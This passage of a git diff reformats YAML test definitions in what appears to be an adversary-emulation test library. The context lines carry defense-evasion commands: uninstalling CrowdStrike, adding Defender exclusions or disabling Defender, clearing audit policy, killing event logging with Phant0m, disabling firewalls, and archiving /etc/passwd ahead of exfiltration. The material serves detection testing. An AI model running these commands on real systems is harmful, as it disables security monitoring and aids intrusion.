&& apt-get install -y zip) - echo Please set input_files argument to include files that exist + - description: | + Files to zip must exist (#{input_files}) + prereq_command: | + if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; + get_prereq_command: | + (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip) + echo Please set input_files argument to include files that exist executor: name: sh elevation_required: false @@ -190,16 +190,16 @@ atomic_tests: description: | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. supported_platforms: - - linux - - macos + - linux + - macos input_arguments: input_file: description: Path that should be compressed - type: Path + type: path default: $HOME/victim-gzip.txt input_content: description: contents of compressed files if file does not already exist. default contains test credit card and social security number - type: String + type: string default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' executor: name: sh @@ -213,24 +213,24 @@ atomic_tests: description: | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. supported_platforms: - - linux - - macos + - linux + - macos input_arguments: input_file_folder: description: Path that should be compressed - type: Path + type: path default: '$HOME/$USERNAME' output_file: description: File that should be output - type: Path + type: path default: '$HOME/data.tar.gz' dependencies: - - description: | - Folder to zip must exist (#{input_file_folder}) - prereq_command: | - test -e #{input_file_folder} - get_prereq_command: | - echo Please set input_file_folder argument to a folder that exists + - description: | + Folder to zip must exist (#{input_file_folder}) + prereq_command: | + test -e #{input_file_folder} + get_prereq_command: | + echo Please set input_file_folder argument to a folder that exists executor: name: sh elevation_required: false @@ -243,28 +243,28 @@ atomic_tests: description: | Encrypt data for exiltration supported_platforms: - - macos - - linux + - macos + - linux input_arguments: test_folder: description: Path used to store files. - type: Path + type: path default: /tmp/T1560 test_file: description: Temp file used to store encrypted data. - type: Path + type: path default: T1560 encryption_password: description: Password used to encrypt data. - type: String + type: string default: InsertPasswordHere dependency_executor_name: sh dependencies: - - description: gpg and zip are required to run the test. - prereq_command: | - if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - get_prereq_command: | - (which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg) + - description: gpg and zip are required to run the test. + prereq_command: | + if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; + get_prereq_command: | + (which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg) executor: name: sh elevation_required: false diff --git a/atomics/T1560.002/T1560.002.yaml b/atomics/T1560.002/T1560.002.yaml index e857fa37..7a80a4aa 100644 --- a/atomics/T1560.002/T1560.002.yaml +++ b/atomics/T1560.002/T1560.002.yaml @@ -7,23 +7,23 @@ atomic_tests: description: | Uses GZip from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .gz file to be - type: Path + type: path default: /tmp/passwd.gz dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false @@ -36,23 +36,23 @@ atomic_tests: description: | Uses bz2 from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .bz2 file to be - type: Path + type: path default: /tmp/passwd.bz2 dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false @@ -65,23 +65,23 @@ atomic_tests: description: | Uses zipfile from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .zip file to be - type: Path + type: path default: /tmp/passwd.zip dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false @@ -94,23 +94,23 @@ atomic_tests: description: | Uses tarfile from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .tar.gz file to be - type: Path + type: path default: /tmp/passwd.tar.gz dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false diff --git a/atomics/T1560/T1560.yaml b/atomics/T1560/T1560.yaml index 83122502..7fcb6a51 100644 --- a/atomics/T1560/T1560.yaml +++ b/atomics/T1560/T1560.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1560 display_name: Archive Collected Data @@ -9,20 +8,20 @@ atomic_tests: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory supported_platforms: - - windows + - windows input_arguments: input_file: description: Path that should be compressed into our output file - type: Path + type: path default: $env:USERPROFILE output_file: description: Path where resulting compressed data should be placed - type: Path + type: path default: $env:USERPROFILE\T1560-data-ps.zip executor: name: powershell elevation_required: false command: | dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - cleanup_command: | - Remove-Item -path #{output_file} -ErrorAction Ignore \ No newline at end of file + cleanup_command: |- + Remove-Item -path #{output_file} -ErrorAction Ignore diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 00a76689..9d1bd5b7 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml @@ -10,19 +10,19 @@ atomic_tests: input_arguments: package_checker: description: Package checking command for linux. - type: String + type: string default: (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed) package_installer: description: Package installer command for linux. Default yum - type: String + type: string default: (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog) flavor_command: description: Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog - type: String + type: string default: systemctl stop rsyslog ; systemctl disable rsyslog cleanup_command: description: Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on - type: String + type: string default: systemctl start rsyslog ; systemctl enable rsyslog dependency_executor_name: sh dependencies: @@ -147,11 +147,11 @@ atomic_tests: input_arguments: falcond_plist: description: The path of the Crowdstrike Falcon plist file - type: Path + type: path default: /Library/LaunchDaemons/com.crowdstrike.falcond.plist userdaemon_plist: description: The path of the Crowdstrike Userdaemon plist file - type: Path + type: path default: /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist executor: command: | @@ -172,7 +172,7 @@ atomic_tests: input_arguments: sysmon_driver: description: The name of the Sysmon filter driver (this can change from the default) - type: String + type: string default: SysmonDrv dependency_executor_name: powershell dependencies: @@ -217,7 +217,7 @@ atomic_tests: input_arguments: sysmon_exe: description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) - type: Path + type: path default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe dependency_executor_name: powershell dependencies: @@ -285,7 +285,7 @@ atomic_tests: input_arguments: service_name: description: The name of the service to stop - type: String + type: string default: McAfeeDLPAgentService executor: command: | @@ -395,7 +395,7 @@ atomic_tests: input_arguments: service_name: description: The name of the service to remove - type: String + type: string default: McAfeeDLPAgentService executor: command: | @@ -412,7 +412,7 @@ atomic_tests: input_arguments: falcond_path: description: The Crowdstrike Windows Sensor path. The Guid always changes. - type: Path + type: path default: C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe executor: command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} @@ -420,7 +420,7 @@ atomic_tests: elevation_required: true - name: Tamper with Windows Defender Evade Scanning -Folder auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed - description: | + description: | Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath @@ -429,20 +429,20 @@ atomic_tests: input_arguments: excluded_folder: description: This folder will be excluded from scanning - type: Path + type: path default: C:\Temp executor: command: |- $excludedpath= "#{excluded_folder}" Add-MpPreference -ExclusionPath $excludedpath - cleanup_command: | + cleanup_command: | $excludedpath= "#{excluded_folder}" Remove-MpPreference -ExclusionPath $excludedpath name: powershell elevation_required: true - name: Tamper with Windows Defender Evade Scanning -Extension auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea - description: | + description: | Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. @@ -451,13 +451,13 @@ atomic_tests: input_arguments: excluded_exts: description: A list of extension to exclude from scanning - type: String + type: string default: .exe executor: command: |- $excludedExts= "#{excluded_exts}" Add-MpPreference -ExclusionExtension $excludedExts - cleanup_command: | + cleanup_command: | $excludedExts= "#{excluded_exts}" Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore name: powershell @@ -473,7 +473,7 @@ atomic_tests: input_arguments: excluded_process: description: A list of processes to exclude from scanning - type: String + type: string default: outlook.exe executor: command: |- @@ -493,12 +493,12 @@ atomic_tests: input_arguments: username: description: office-365 username - type: String - default: null + type: string + default: password: description: office-365 password - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -531,7 +531,7 @@ atomic_tests: elevation_required: false - name: Disable Windows Defender with DISM auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58 - description: | + description: | The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. @@ -551,12 +551,12 @@ atomic_tests: - windows input_arguments: DefenderID: - description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). - type: String + description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). + type: string default: FFFF DefenderControlExe: - description: Path to Defender Control software version 1.6. - type: String + description: Path to Defender Control software version 1.6. + type: string default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe dependency_executor_name: powershell dependencies: @@ -586,11 +586,11 @@ atomic_tests: input_arguments: AdvancedRun_Location: description: Path of Advanced Run executable - type: Path + type: path default: '$env:temp\AdvancedRun.exe' delete_defender_folder: description: Set to 1 to also delete the Windows Defender folder - type: Integer + type: integer default: 0 dependency_executor_name: powershell dependencies: @@ -667,20 +667,20 @@ atomic_tests: - name: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e description: | - LockBit Black - Disable Privacy Settings Experience Using Registry + LockBit Black - Disable Privacy Settings Experience Using Registry supported_platforms: - windows executor: command: | reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f cleanup_command: | - reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1 + reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1 name: command_prompt elevation_required: true - name: LockBit Black - Use Registry Editor to turn on automatic logon -cmd auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 description: | - LockBit Black - Use Registry Editor to turn on automatic logon + LockBit Black - Use Registry Editor to turn on automatic logon supported_platforms: - windows executor: @@ -699,7 +699,7 @@ atomic_tests: - name: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374 description: | - LockBit Black - Disable Privacy Settings Experience Using Registry + LockBit Black - Disable Privacy Settings Experience Using Registry supported_platforms: - windows executor: @@ -712,7 +712,7 @@ atomic_tests: - name: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a description: | - Lockbit Black - Use Registry Editor to turn on automatic logon + Lockbit Black - Use Registry Editor to turn on automatic logon supported_platforms: - windows executor: @@ -730,7 +730,7 @@ atomic_tests: elevation_required: true - name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012 - description: | + description: | The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. @@ -744,12 +744,12 @@ atomic_tests: Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore - name: powershell + name: powershell elevation_required: true - name: WMIC Tamper with Windows Defender Evade Scanning Folder auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 - description: | + description: | The following Atomic will attempt to exclude a folder within Defender leveraging WMI Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ supported_platforms: @@ -761,8 +761,8 @@ atomic_tests: wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\" name: command_prompt elevation_required: true - -- name: Delete Windows Defender Scheduled Tasks + +- name: Delete Windows Defender Scheduled Tasks auto_generated_guid: 4b841aa1-0d05-4b32-bbe7-7564346e7c76 description: | The following atomic test will delete the Windows Defender scheduled tasks. @@ -771,15 +771,15 @@ atomic_tests: supported_platforms: - windows dependencies: - - description: | - The Windows Defender scheduled tasks must be backed up first - prereq_command: | - IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 ) - get_prereq_command: | - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml" - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml" - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml" - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml" + - description: | + The Windows Defender scheduled tasks must be backed up first + prereq_command: | + IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: | + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml" + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml" + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml" + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml" executor: command: | IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f ) diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml index cf3e4390..80d377e4 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1562.002/T1562.002.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: website_name: description: The name of the website on a server - type: String + type: string default: Default Web Site executor: command: | @@ -35,7 +35,7 @@ atomic_tests: input_arguments: website_name: description: The name of the website on a server - type: String + type: string default: Default Web Site executor: command: | @@ -70,10 +70,10 @@ atomic_tests: description: >- Disables the windows audit policy to prevent key host based telemetry being written into the event logs. - + [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) supported_platforms: - - windows + - windows executor: command: | auditpol /set /category:"Account Logon" /success:disable /failure:disable @@ -90,7 +90,7 @@ atomic_tests: description: >- Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. supported_platforms: - - windows + - windows executor: command: | auditpol /clear /y @@ -111,7 +111,7 @@ atomic_tests: input_arguments: log_name: description: Name of the log to be disabled - type: String + type: string default: Microsoft-Windows-IKE/Operational executor: command: | @@ -128,7 +128,7 @@ atomic_tests: input_arguments: file_name: description: exe version of Phant0m - type: Path + type: path default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe dependency_executor_name: powershell dependencies: @@ -144,4 +144,4 @@ atomic_tests: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe cleanup_command: | echo "Sorry you have to reboot" - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1562.003/T1562.003.yaml index 2cbda1fd..bcb46d99 100644 --- a/atomics/T1562.003/T1562.003.yaml +++ b/atomics/T1562.003/T1562.003.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: evil_command: description: Command to run after shell history collection is disabled - type: String + type: string default: whoami executor: command: | @@ -34,4 +34,4 @@ atomic_tests: 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile 3. ls 4. whoami > recon.txt - name: manual \ No newline at end of file + name: manual diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 9f4ecf1e..19e3ee35 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -41,7 +41,7 @@ atomic_tests: cleanup_command: | netsh advfirewall reset >nul 2>&1 name: command_prompt -- name: Opening ports for proxy - HARDRAIN +- name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 description: | This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. @@ -63,7 +63,7 @@ atomic_tests: input_arguments: local_port: description: This is the local port you wish to test opening - type: Integer + type: integer default: 3389 executor: command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any @@ -78,7 +78,7 @@ atomic_tests: input_arguments: exe_file_path: description: path to exe file - type: Path + type: path default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe executor: command: | @@ -89,21 +89,21 @@ atomic_tests: Remove-Item C:\Users\$env:UserName\AtomicTest.exe -ErrorAction Ignore name: powershell elevation_required: true -- name: Stop/Start UFW firewall +- name: Stop/Start UFW firewall auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: | Stop the Uncomplicated Firewall (UFW) if installed. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if ufw is installed on the machine. - prereq_command: | - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if ufw is installed on the machine. + prereq_command: | + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -112,22 +112,22 @@ atomic_tests: cleanup_command: | ufw enable ufw status verbose -- name: Stop/Start UFW firewall systemctl +- name: Stop/Start UFW firewall systemctl auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1 description: | Stop the Uncomplicated Firewall (UFW) if installed, using systemctl. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if systemctl and ufw is installed on the machine. - prereq_command: | - if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if systemctl and ufw is installed on the machine. + prereq_command: | + if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -136,21 +136,21 @@ atomic_tests: cleanup_command: | systemctl start ufw systemctl status ufw -- name: Turn off UFW logging +- name: Turn off UFW logging auto_generated_guid: 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad description: | Turn off the Uncomplicated Firewall (UFW) logging. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if ufw is installed on the machine and enabled. - prereq_command: | - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if ufw is installed on the machine and enabled. + prereq_command: | + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -159,21 +159,21 @@ atomic_tests: cleanup_command: | ufw logging low ufw status verbose -- name: Add and delete UFW firewall rules +- name: Add and delete UFW firewall rules auto_generated_guid: b2563a4e-c4b8-429c-8d47-d5bcb227ba7a description: | Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if ufw is installed on the machine and enabled. - prereq_command: | - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if ufw is installed on the machine and enabled. + prereq_command: | + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -183,20 +183,20 @@ atomic_tests: cleanup_command: | { echo y; echo response; } | ufw delete 1 ufw status numbered -- name: Edit UFW firewall user.rules file +- name: Edit UFW firewall user.rules file auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: | Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/ufw/user.rules exists. - prereq_command: | - if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/ufw/user.rules exists. + prereq_command: | + if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -205,7 +205,7 @@ atomic_tests: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules -- name: Edit UFW firewall ufw.conf file +- name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: | Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -213,13 +213,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/ufw/ufw.conf exists. - prereq_command: | - if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/ufw/ufw.conf exists. + prereq_command: | + if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -229,7 +229,7 @@ atomic_tests: cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf cat /etc/ufw/ufw.conf -- name: Edit UFW firewall sysctl.conf file +- name: Edit UFW firewall sysctl.conf file auto_generated_guid: c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 description: | Edit the Uncomplicated Firewall (UFW) configuration file for setting network @@ -237,13 +237,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/ufw/sysctl.conf exists. - prereq_command: | - if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/ufw/sysctl.conf exists. + prereq_command: | + if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -253,7 +253,7 @@ atomic_tests: cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf cat /etc/ufw/sysctl.conf -- name: Edit UFW firewall main configuration file +- name: Edit UFW firewall main configuration file auto_generated_guid: 7b697ece-8270-46b5-bbc7-6b9e27081831 description: | Edit the Uncomplicated Firewall (UFW) main configuration file for setting @@ -261,13 +261,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /etc/default/ufw exists. - prereq_command: | - if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /etc/default/ufw exists. + prereq_command: | + if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -276,7 +276,7 @@ atomic_tests: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: | sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw -- name: Tail the UFW firewall log file +- name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: | Print the last 10 lines of the Uncomplicated Firewall (UFW) log file @@ -284,13 +284,13 @@ atomic_tests: supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if /var/log/ufw.log exists. - prereq_command: | - if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if /var/log/ufw.log exists. + prereq_command: | + if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true @@ -300,7 +300,7 @@ atomic_tests: - name: LockBit Black - Unusual Windows firewall registry modification -cmd auto_generated_guid: a4651931-ebbb-4cde-9363-ddf3d66214cb description: | - An adversary tries to modify the windows firewall registry + An adversary tries to modify the windows firewall registry supported_platforms: - windows executor: @@ -315,7 +315,7 @@ atomic_tests: - name: LockBit Black - Unusual Windows firewall registry modification -Powershell auto_generated_guid: 80b453d1-eec5-4144-bf08-613a6c3ffe12 description: | - An adversary tries to modify the windows firewall registry. + An adversary tries to modify the windows firewall registry. supported_platforms: - windows executor: @@ -323,14 +323,14 @@ atomic_tests: New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force cleanup_command: | - Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -Force -ErrorAction Ignore - Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force 